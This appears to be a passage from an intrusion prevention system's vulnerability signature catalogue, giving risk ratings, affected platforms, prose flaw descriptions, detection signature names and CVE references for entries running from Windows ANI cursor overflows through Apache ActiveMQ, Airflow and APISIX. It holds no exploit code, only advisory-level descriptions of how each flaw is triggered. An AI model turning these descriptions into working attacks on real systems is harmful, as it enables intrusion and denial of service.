Last changed:	sgpkg-ips-1296-5242
Platform:	Android
Software:	<os>
Type:	Code Injection
Description:	Android/Bgserv is a trojan for Android planform.
Situation:	HTTP_CSH-Android/Bgserv-Traffic

Ani-Windows-Animated-Cursor-Code-Execution

About this vulnerability:

Incorrect length field buffer overflow

Risk:

High

First detected in:

sgpkg-ips-101-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 SP4; Windows 2003; Windows XP SP2; Windows Vista

Software:

<os>

Type:

Buffer Overflow

Description:

Microsoft Windows incorrectly parses the AnimationHeader information in ANI files. The length of the header should be 36 bytes, but the value is not checked properly. This allows specially-crafted ANI files to cause a buffer overflow, leading to arbitrary code execution. Animated cursors can be supplied by web pages, which allows malicious web sites to compromise systems when they are viewed with Internet Explorer. Also, viewing folders that contain malicious ANI files causes a buffer overflow in Windows Explorer.

Situation:

HTTP_Ani-Windows-Animationheader-Length-Buffer-Overflow
E-Mail_BS-Ani-Windows-Animationheader-Length-Buffer-Overflow
File-RIFF_Ani-Windows-Animationheader-Length-Buffer-Overflow

References:

CVE-2007-0038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0038

BID-23194
http://www.securityfocus.com/bid/23194

OSVDB-33629
http://www.osvdb.org/33629

MS07-017
http://technet.microsoft.com/security/bulletin/MS07-017

Ani-Windows-Animationheader-Length-Buffer-Overflow

About this vulnerability:

ANI file incorrect length field buffer overflow

Risk:

High

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows ME; Windows 2000 SP0; Windows 2000 SP1; Windows 2000 SP2; Windows 2000 SP3; Windows 2000 SP4; Windows 2003; Windows XP SP0; Windows XP SP1

Software:

<os>

Type:

Buffer Overflow

Description:

Microsoft Windows Explorer and Internet Explorer parses incorrectly the AnimationHeader information in ANI files. The length of the header should be 36 bytes, but the value is not checked properly. This allows specially-crafted ANI files to cause a buffer overflow, leading to arbitrary code execution. Animated cursors can be supplied by web pages, which allows malicious web sites to compromise systems when they are viewed with IE. Also, viewing folders that contain malicious ANI files causes a buffer overflow in Windows Explorer.

Situation:

HTTP_Ani-Windows-Animationheader-Length-Buffer-Overflow
SMB-TCP_FR-Ani-Windows-Animationheader-Length-Buffer-Overflow-Upload
SMB-TCP_FW-Ani-Windows-Animationheader-Length-Buffer-Overflow-Upload
File-RIFF_Ani-Windows-Animationheader-Length-Buffer-Overflow

References:

CVE-2004-1049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1049

BID-12233
http://www.securityfocus.com/bid/12233

OSVDB-12623
http://www.osvdb.org/12623

MS05-002
http://technet.microsoft.com/security/bulletin/MS05-002

Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-Denial-Of-Service

About this vulnerability:

ANI file zero frame number or rate number causes Windows to crash

Risk:

Moderate

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT; Windows 2000 SP0; Windows 2000 SP1; Windows 2000 SP2; Windows 2000 SP3; Windows 2000 SP4; Windows 2003; Windows XP SP0; Windows XP SP1

Software:

<os>

Type:

Malfunction

Description:

Microsoft Windows fails to properly check the frame number and the rate number while parsing ANI files. By setting either of these values to zero in an ANI file, and tricking a victim to view the file in Windows Explorer or Internet Explorer, remote attackers can cause the victim's Windows operating system to freeze.

Situation:

HTTP_Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-Denial-Of-Service
SMB-TCP_FR-Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-DoS-Download
SMB-TCP_FW-Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-DoS-Upload
File-RIFF_Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-Denial-Of-Service

References:

CVE-2004-0315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0315

BID-12094
http://www.securityfocus.com/bid/12094

ANT-Studio-Web-Server-Denial-Of-Service

About this vulnerability:	A vulnerability in ANT Studio web server allowing denial of service.
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	ANT Studio
Type:	Malfunction
Description:	A vulnerability in ANT Studio web server allowing an attacker can send custom TCP packets causing a denial of service condition.
Situation:	Generic_CS-ANT-Studio-Web-Server-Denial-Of-Service

Anviz-CrossChex-Buffer-Overflow

About this vulnerability:

A vulnerability in Anviz CrossChex

Risk:

High

First detected in:

sgpkg-ips-1224-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Anviz CrossChex

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Anviz CrossChex which allows remote attackers to execute arbitrary code by waiting for broadcasts from Ainz CrossChex looking for new devices and returning a malicious broadcast.

Situation:

Generic_UDP-Anviz-CrossChex-Buffer-Overflow

References:

CVE-2019-12518
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12518

AnyDesk-GUI-Format-String-Write

About this vulnerability:

A vulnerability in AnyDesk

Risk:

High

First detected in:

sgpkg-ips-1358-5242

Last changed:

sgpkg-ips-1358-5242

Platform:

Linux

Software:

AnyDesk

Type:

Input Validation

Description:

A vulnerability in AnyDesk, version 5.5.2, which allows remote attackers to execute arbitrary code using a format string write by sending a specially crafted discovery packet.

Situation:

Generic_UDP-AnyDesk-GUI-Format-String-Write

References:

CVE-2020-13160
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13160

AOL-Desktop-Rtx-File-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in AOL Desktop

Risk:

Moderate

First detected in:

sgpkg-ips-426-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

AOL

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in AOL Desktop software. The vulnerability is due to a boundary error while parsing a specially crafted .RTX file. Remote attackers could exploit this vulnerability by enticing target users to open the crafted file with a vulnerable version of the AOL Desktop. Successful exploitation would result in arbitrary code injection and execution with the privileges of the logged in user. If code execution is not successful, the application may terminate abnormally.

Situation:

File-Text_Long-Domain-Name-In-HREF

References:

BID-46129
http://www.securityfocus.com/bid/46129

AOL-Explorer-ActiveX-Vulnerable-Function-Call

About this vulnerability:	Vulnerable function call against AOL Explorer
Risk:	Low
First detected in:	sgpkg-ips-579-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Internet Explorer
Type:	Insecure Configuration
Description:	A vulnerability exists in the AOL branded Internet Explorer when calling certain ActiveX functions.
Situation:	File-Text_AOL-Explorer-ActiveX-Vulnerable-Function-Call

AOL-Instant-Messenger-Away-Message-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in AOL Instant Messenger

Risk:

High

First detected in:

sgpkg-ips-133-2032

Last changed:

sgpkg-ips-1341-5242

Platform:

Windows

Software:

AOL Instant Messenger

Type:

Malfunction

Description:

There is a buffer overflow vulnerability in AOL Instant Messenger. The vulnerability allows arbitary code execution in the context of the current user.

Situation:

HTTP_SS-AOL-Instant-Messenger-Away-Message-Buffer-Overflow

References:

CVE-2004-0636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0636

BID-10889
http://www.securityfocus.com/bid/10889

AOL-Instant-Messenger-Usage

About this vulnerability:	AOL Instant Messenger usage
Risk:	Moderate
First detected in:	sgpkg-ips-12-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	AOL Instant Messenger
Type:	Peer-to-Peer
Description:	AOL Instant Messenger is a peer-to-peer network client that can be used to send messages and share files among users.
Situation:	HTTP_CS-AOL-Instant-Messenger-Usage IM-TCP_AOL-SignOn IM-TCP_Aim-SignOn-Reply

AOL-Phobox-Playlist-ActiveX-Component-Buffer-Overflow

About this vulnerability:

A vulnerability in AOL Phobos Playlist ActiveX control

Risk:

High

First detected in:

sgpkg-ips-372-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

AOL

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Phobox.Playlist ActiveX control distributed by American Online (AOL). The ActiveX control fails to sanitize user supplied input leading to a buffer overflow condition. A successful exploitation may lead to code execution in the context of the current user.

Situation:

HTTP_SS-AOL-Phobox-Playlist-ActiveX-Component-Buffer-Overflow
File-Text_AOL-Phobox-Playlist-ActiveX-Component-Buffer-Overflow

References:

OSVDB-61964
http://www.osvdb.org/61964

AOL-Radio-AmpX-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in AOL Radio ActiveX control

Risk:

High

First detected in:

sgpkg-ips-138-2032

Last changed:

sgpkg-ips-1400-5242

Platform:

Windows

Software:

AOL Radio

Type:

Buffer Overflow

Description:

There are multiple buffer overflow vulnerabilities in AOL Radio. These vulnerabilities are due to boundary errors in the AOL Radio AmpX ActiveX Control. A remote attacker can exploit these vulnerabilities by enticing the target user to open a crafted web page, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-AOL-Radio-AmpX-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-5755
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5755

BID-26396
http://www.securityfocus.com/bid/26396

OSVDB-38705
http://www.osvdb.org/38705

AOL-Radio-AmpX-ActiveX-Control-ControlFile-Buffer-Overflow

About this vulnerability:

A vulnerability in AOL Radio AmpX ActiveX Control

Risk:

High

First detected in:

sgpkg-ips-261-3038

Last changed:

sgpkg-ips-1583-5242

Platform:

Windows

Software:

AOL Radio

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in AOL Radio AmpX ActiveX control. The vulnerability is due to a lack of input validation when handling arguments of a ControlFile() method. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation allows for arbitrary code injection and execution with the privileges of the currently logged in user.

Situation:

HTTP_SS-AOL-Radio-AmpX-ActiveX-Control-ControlFile-Buffer-Overflow

References:

BID-35028
http://www.securityfocus.com/bid/35028

OSVDB-54706
http://www.osvdb.org/54706

AOL-SuperBuddy-ActiveX-Control-Function-Deference

About this vulnerability:

A vulnerability in AOL SuperBuddy ActiveX control

Risk:

High

First detected in:

sgpkg-ips-370-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

AOL

Type:

Input Validation

Description:

There is a function deference vulnerability in SuperBuddy ActiveX control distributed in American Online (AOL) client software. The vulnerability is caused by an insufficient input validation when user controlled input is processed by the ActiveX control. Successful exploitation leads arbitrary code execution in the context of the current user.

Situation:

HTTP_SS-AOL-SuperBuddy-ActiveX-Control-Function-Deference
File-Text_AOL-SuperBuddy-ActiveX-Control-Function-Deference

References:

CVE-2006-5820
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5820

BID-23224
http://www.securityfocus.com/bid/23224

OSVDB-34318
http://www.osvdb.org/34318

Apache-1.3-Mod_Proxy-Buffer-Overflow

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

A vulnerability exists in the mod_proxy module of Apache 1.3, which can be used as a web proxy, reverse proxy, and/or cache. This module contains a heap-based buffer overflow that occurs while retrieving an HTTP response from a malicious server on behalf of a client. An attacker may use this vulnerability to trigger a denial of service on the vulnerable Apache server. There is also the possibility of remote code execution on some older operating system platforms. On most platforms, upon reception of a specially crafted response, the child process acting as a proxy for a client will terminate, closing any open TCP connections. As neither the parent Apache process nor any other child processes are affected, the denial of service condition only affects connections being handled by the process being attacked (possible only the attacking client). Other connections to the Apache server will be unaffected. On some older OpenBSD and FreeBSD distributions, the vulnerability can be exploited to execute code, due to the particulars of their implementation of the memcpy() function. In such cases, the behaviour of the compromised server depends on the nature of the exploit code.

Situation:

HTTP_SHS-Apache-1.3-Mod_Proxy-Buffer-Overflow

References:

CVE-2004-0492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0492

BID-10508
http://www.securityfocus.com/bid/10508

Apache-2-Mod_SSL-Connection-Abort-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

There is a vulnerability in the Apache HTTP server SSL module, mod_ssl. This module, which is responsible for managing encrypted communications, can be forced into an infinite loop by the unexpected termination of connection. This vulnerability may be exploited by an attacker to cause a denial of service condition. If the vulnerability is triggered a single time, a single child process will enter an infinite loop and be unable to service current or new connections. The Apache server children will continue to operate, though at reduced efficiency. If the vulnerability is triggered multiple times, the target system can become unresponsive due to CPU resource exhaustion. If the vulnerability is triggered once per Apache server child, a complete denial of service will occur.

Situation:

HTTPS_CS-Apache-2-Mod_SSL-Connection-Abort-Denial-Of-Service

References:

CVE-2004-0748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0748

BID-11094
http://www.securityfocus.com/bid/11094

Apache-Activemq-Authenticated-Arbitrary-Code-Execution-CVE-2022-41678

About this vulnerability:

An attempt to exploit a vulnerability in Apache ActiveMQ detected

Risk:

High

First detected in:

sgpkg-ips-1837-5242

Last changed:

sgpkg-ips-1837-5242

Platform:

Generic

Software:

Apache ActiveMQ

Type:

Input Validation

Description:

CVE-2022-41678 is an authenticated, arbitrary code execution vulnerability in the Jolokia component of Apache ActiveMQ prior to 5.16.6 and 5.17.0.

Situation:

HTTP_CRL-Apache-Activemq-Authenticated-Arbitrary-Code-Execution-CVE-2022-41678

References:

CVE-2022-41678
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41678

Apache-Activemq-File-Disclosure

About this vulnerability:

An Apache ActiveMQ File Disclosure vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-760-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache ActiveMQ

Type:

Input Validation

Description:

A vulnerability in Apache Active MQ, versions 5.x before 5.3.2 and 5.4.x before 5.4.0, which allows remote attackers to read source code via a double slash // at the start in a URI to admin/index.jsp, admin/queues.jsp, and admin/topics.jsp.

Situation:

HTTP_CSU-Apache-Activemq-File-Disclosure

References:

CVE-2010-1587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1587

BID-39636
http://www.securityfocus.com/bid/39636

OSVDB-64020
http://www.osvdb.org/64020

Apache-Activemq-File-Upload-Directory-Traversal

About this vulnerability:

A vulnerability in Apache Software Foundation ActiveMQ

Risk:

Moderate

First detected in:

sgpkg-ips-681-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache ActiveMQ

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in Apache ActiveMQ. The vulnerability is due to a flaw in the file server upload/download functionality used for blob messages. A remote, unauthenticated attacker may exploit this vulnerability by uploading a specially crafted file to the server. Successful exploitation could lead to execution of arbitrary code.

Situation:

HTTP_CSH-Apache-Activemq-File-Upload-Directorytraversal

References:

CVE-2015-1830
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1830

Apache-Activemq-Fileserver-File-Upload-Directory-Traversal

About this vulnerability:

A vulnerability in Apache Software Foundation ActiveMQ

Risk:

High

First detected in:

sgpkg-ips-774-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache ActiveMQ

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in Apache ActiveMQ. A remote attacker could use this to execute arbitrary code on the affected system.

Situation:

HTTP_CRL-Apache-Activemq-Fileserver-File-Upload-Directory-Traversal

References:

CVE-2016-3088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3088

Apache-Activemq-Fileserver-Move-Directory-Traversal

About this vulnerability:

A vulnerability in Apache Software Foundation ActiveMQ

Risk:

High

First detected in:

sgpkg-ips-769-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache ActiveMQ

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in the fileserver web application in Apache ActiveMQ. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

HTTP_CSH-Apache-Activemq-Fileserver-Move-Directory-Traversal

References:

CVE-2016-3088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3088

Apache-Activemq-Jmx-Rmiconnectorserver-Remote-Code-Execution

About this vulnerability:

A vulnerability in Apache ActiveMQ

Risk:

Moderate

First detected in:

sgpkg-ips-1316-5242

Last changed:

sgpkg-ips-1316-5242

Platform:

Generic

Software:

Apache ActiveMQ

Type:

Malfunction

Description:

Insufficient validation of JMX requests causes a vulnerability in Apache ActiveMQ. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Apache-Activemq-Jmx-Rmiconnectorserver-Remote-Code-Execution

References:

CVE-2020-11998
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11998

Apache-Activemq-OpenWire-Insecure-Deserialization-CVE-2023-46604

About this vulnerability:

An attempt to exploit a vulnerability in Apache ActiveMQ detected

Risk:

High

First detected in:

sgpkg-ips-1646-5242

Last changed:

sgpkg-ips-1646-5242

Platform:

Generic

Software:

Apache ActiveMQ

Type:

Input Validation

Description:

Apache ActiveMQ is vulnerable to remote code execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.

Situation:

Generic_CS-Apache-Activemq-OpenWire-Insecure-Deserialization-CVE-2023-46604

References:

CVE-2023-46604
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46604

Apache-Activemq-Shutdown-Command-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation ActiveMQ

Risk:

Moderate

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache ActiveMQ

Type:

Malfunction

Description:

A denial of service vulnerability exists in Apache ActiveMQ. The vulnerability is due to missing authentication for the undocumented shutdown command. A remote, unauthenticated attacker may exploit this vulnerability by sending crafted packets to the server. Successful exploitation could lead to a denial of service condition.

Situation:

Generic_CS-Apache-Activemq-Shutdown-Command-Denial-Of-Service

References:

CVE-2014-3576
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3576

Apache-Activemq-Web-Console-Message.jsp-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apache Software Foundation ActiveMQ

Risk:

Moderate

First detected in:

sgpkg-ips-1322-5242

Last changed:

sgpkg-ips-1322-5242

Platform:

Generic

Software:

Apache ActiveMQ

Type:

Input Validation

Description:

A cross-site scripting vulnerability has been reported in Apache ActiveMQ. The vulnerability is due to insufficient validation of the JMSDestination parameter to message.jsp in the web console. A remote attacker could exploit this vulnerability by enticing a target user to open a malicious crafted link or web page. Successful exploitation could lead to arbitrary script execution in the target user's browser under the security context of the user.

Situation:

HTTP_CRL-Apache-Activemq-Web-Console-Message.jsp-Cross-Site-Scripting

References:

CVE-2020-13947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13947

Apache-Activemq-Web-Console-Queuefilter-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apache Software Foundation ActiveMQ

Risk:

Moderate

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache ActiveMQ

Type:

Cross-site Scripting

Description:

There has been reported a cross-site scripting vulnerability in Apache ActiveMQ. Exploiting this vulnerability requires the target user to open maliciously crafted link. Successful exploitation can lead to arbitrary script execution in the target user's browser.

Situation:

HTTP_CRL-Apache-Activemq-Web-Console-Queuefilter-Cross-Site-Scripting

References:

CVE-2018-8006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8006

Apache-Airflow-Celery-Broker-RCE-CVE-2020-11981

About this vulnerability:

An attempt to exploit a vulnerability in Apache Airflow detected

Risk:

High

First detected in:

sgpkg-ips-1853-5242

Last changed:

sgpkg-ips-1853-5242

Platform:

Generic

Software:

Apache Airflow

Type:

Input Validation

Description:

An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.

Situation:

Generic_CS-Apache-Airflow-Celery-Broker-RCE-CVE-2020-11981

References:

CVE-2020-11981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11981

Apache-Airflow-Dag-OS-Command-Injection

About this vulnerability:

A vulnerability in Apache Software Foundation Airflow

Risk:

Moderate

First detected in:

sgpkg-ips-1451-5242

Last changed:

sgpkg-ips-1451-5242

Platform:

Generic

Software:

Apache Airflow

Type:

Input Validation

Description:

Improper input validation for parameters for certain directed acyclic graphs (DAGs) in user-sent data causes a command injection vulnerability in Apache Airflow. A successful exploit allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CRL-Apache-Airflow-Dag-OS-Command-Injection

References:

CVE-2022-24288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24288

Apache-Airflow-Dag-Run_Id-Command-Injection

About this vulnerability:

A vulnerability in Apache Airflow.

Risk:

High

First detected in:

sgpkg-ips-1532-5242

Last changed:

sgpkg-ips-1533-5242

Platform:

Generic

Software:

Apache Airflow

Type:

Input Validation

Description:

A vulnerability in Apache Airflow, versions before 2.4.0, which allows remote attackers to execute arbitrary commands by sending a crafted request to the target server, due to improper input validation for parameter "run_id" for directed acyclic graphs (DAGs).

Situation:

HTTP_CRL-Apache-Airflow-Dag-Run_Id-Command-Injection

References:

CVE-2022-40127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40127

Apache-Airflow-Experimental-API-Authentication-Bypass-CVE-2020-13927

About this vulnerability:

A vulnerability in Apache Airflow

Risk:

High

First detected in:

sgpkg-ips-1820-5242

Last changed:

sgpkg-ips-1820-5242

Platform:

Generic

Software:

Apache Airflow

Type:

Insecure Configuration

Description:

Apache Airflow Experimental API default settings in versions prior to 1.10.11 allowed access without any authentication requirements. The default behaviour was changed in version 1.10.11 to deny all requests. This vulnerability can be combined with CVE-2020-11978 for unauthenticated remote code execution.

Situation:

HTTP_CSU-Apache-Airflow-Experimental-API-Request

References:

CVE-2020-13927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13927

Apache-Airflow-Origin-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Apache Airflow

Risk:

High

First detected in:

sgpkg-ips-1288-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

Apache Airflow

Type:

Input Validation

Description:

There exists a vulnerability in Apache Airflow, versions prior to 1.10.12, which allows remote attackers to execute arbitrary code via the 'origin' parameter due to insufficient user input validation.

Situation:

HTTP_CRL-Apache-Airflow-Origin-Cross-Site-Scripting

References:

CVE-2020-13944
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13944

Apache-Airflow-Remote-Code-Execution-CVE-2020-11978

About this vulnerability:

An attempt to exploit a vulnerability in Apache Airflow

Risk:

High

First detected in:

sgpkg-ips-1428-5242

Last changed:

sgpkg-ips-1428-5242

Platform:

Generic

Software:

Apache Airflow

Type:

Input Validation

Description:

There exists a vulnerability in Apache Airflow, versions 1.10.10 and earlier, which allows authenticated remote attackers to execute arbitrary code via an example DAG shipped with Airflow.

Situation:

HTTP_CRL_Apache-Airflow-Remote-Code-Execution-CVE-2020-11978

References:

CVE-2020-11978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11978

Apache-APISIX-Admin-API-Default-Access-Token-RCE

About this vulnerability:

A vulnerability in Apache APISIX.

Risk:

High

First detected in:

sgpkg-ips-1445-5242

Last changed:

sgpkg-ips-1445-5242

Platform:

Unix

Software:

Apache APISIX

Type:

Insecure Configuration

Description:

A vulnerability in Apache APISIX, versions before 2.x, which allows remote attackers to access all of the admin API, which leads to remote LUA code execution through the script parameter.

Situation:

HTTP_CS-Apache-APISIX-Admin-API-Default-Access-Token-RCE

References:

CVE-2020-13945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13945

Apache-APISIX-Batch-Requests-Plugin-IP-Restriction-Bypass

About this vulnerability:

A vulnerability in Apache Software Foundation APISIX

Risk:

Moderate

First detected in:

sgpkg-ips-1448-5242

Last changed:

sgpkg-ips-1448-5242

Platform:

Generic

Software:

Apache APISIX

Type:

Malfunction

Description:

Insufficient validation of client requests causes a policy bypass vulnerability in Apache APISIX. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Apache-APISIX-Batch-Requests-Plugin-IP-Restriction-Bypass

References:

CVE-2022-24112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24112

Apache-APISIX-Dashboard-Middleware-Authentication-Bypass

About this vulnerability:

A vulnerability in Apache APISIX Dashboard.

Risk:

High

First detected in:

sgpkg-ips-1453-5242

Last changed:

sgpkg-ips-1453-5242

Platform:

Unix

Software:

Apache APISIX

Type:

Malfunction

Description:

An vulnerability in Apache APISIX Dashboard, versions prior to 2.10.1, which allows remote attackers to execute arbitrary code by sending a crafted request to a vulnerable server, due to APIs using the interface of framework "gin" directly, resulting in authentication bypass.

Situation:

HTTP_CSU-Apache-APISIX-Dashboard-Middleware-Authentication-Bypass

References:

CVE-2021-45232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45232

Apache-Apr-Apr_Fnmatch-Stack-Overflow-DOS

About this vulnerability:

A vulnerability in Apache APR

Risk:

Moderate

First detected in:

sgpkg-ips-394-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache APR; Apache2

Type:

Malfunction

Description:

A stack overflow vulnerability exists in the Apache Portable Runtime (APR) library. The vulnerability is due to improper implementation of fnmatch, in the apr_fnmatch.c component. The vulnerable function can be reached through the use of the mod_autoindex component.

Situation:

HTTP_CSU-Apache-Apr-Apr_Fnmatch-Stack-Overflow-DOS

References:

CVE-2011-0419
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0419

Apache-Apr-Util-IPv6-URI-Parsing

About this vulnerability:

A vulnerability in Apache

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

A input validation vulnerability exists in the way the apr-util library, a component of the Apache 2.x HTTP server, parses URI strings.. The vulnerability can be triggered by sending a crafted URL which contain a malformed IPv6 literal addresses. The vulnerability is exploitable whether or not the HTTP server is bound to an IPv4 or IPv6 address. An attacker can trigger the vulnerability to create a denial of service condition. Under some configurations or platforms, exploitation of the vulnerability could lead to remote code execution.

Situation:

HTTP_CSU-Apache-Apr-Util-IPv6-URI-Parsing-2
HTTP_CSU-Apache-Apr-Util-IPv6-URI-Parsing

References:

CVE-2004-0786
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0786

Apache-Apr-Util-IPv6-URI-Parsing-Vulnerability

About this vulnerability:

An Apache apr-util IPv6 URI Parsing vulnerability

Risk:

High

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Input Validation

Description:

A vulnerability in Apache HTTP server which allows remote attackers to cause a denial of service condition by sending a crafted URL which contains a malformed IPv6 literal address, weather or not the HTTP server is bound to an IPv4 or IPv6 address.

Situation:

HTTP_CS-Apache-Apr-Util-IPv6-URI-Parsing-Vulnerability

References:

CVE-2004-0786
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0786

Apache-Axis-Jsp-File-Upload

About this vulnerability:

JSP file upload to Apache Axis web service

Risk:

Moderate

First detected in:

sgpkg-ips-625-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Axis

Type:

Malfunction

Description:

Uploading script source code files to vulnerable servers may give an attacker the chance of executing arbitrary scripts on target computer.

Situation:

HTTP_CS-Apache-Axis-Jsp-File-Upload

References:

CVE-2008-0457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0457

BID-27487
http://www.securityfocus.com/bid/27487

Apache-Axis-Soap-Array-Exhaustion

About this vulnerability:

A vulnerability in Apache Axis

Risk:

Moderate

First detected in:

sgpkg-ips-598-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Axis

Type:

Resource Starvation

Description:

A vulnerability exists in the way Apache Axis handles requests with SOAP arrays in the parameters.

Situation:

File-TextId_Apache-Axis-Soap-Array-Exhaustion

References:

CVE-2004-1815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1815

BID-9877
http://www.securityfocus.com/bid/9877

Apache-Axis-Soap-Web-Services-Denial-Of-Service

About this vulnerability:	A vulnerability in Apache Axis
Risk:	High
First detected in:	sgpkg-ips-416-4219
Last changed:	sgpkg-ips-1453-5242
Platform:	Generic
Software:	Apache Axis; ColdFusion; Macromedia JRun 4; Java Application Server
Type:	Resource Starvation
Description:	A vulnerability exists in the way Apache Axis handles requests with SOAP arrays in the parameters. Apache Axis is embedded within several Web Services packages. Attackers can trigger the vulnerability to cause a denial of service condition in a vulnerable service.
Situation:	File-TextId_Apache-Axis-Soap-Web-Services-Denial-Of-Service

Apache-Byte-Range-Filter-Denial-Of-Service

About this vulnerability:

A vulnerability in Apache Software Foundation HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-354-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache2

Type:

Malfunction

Description:

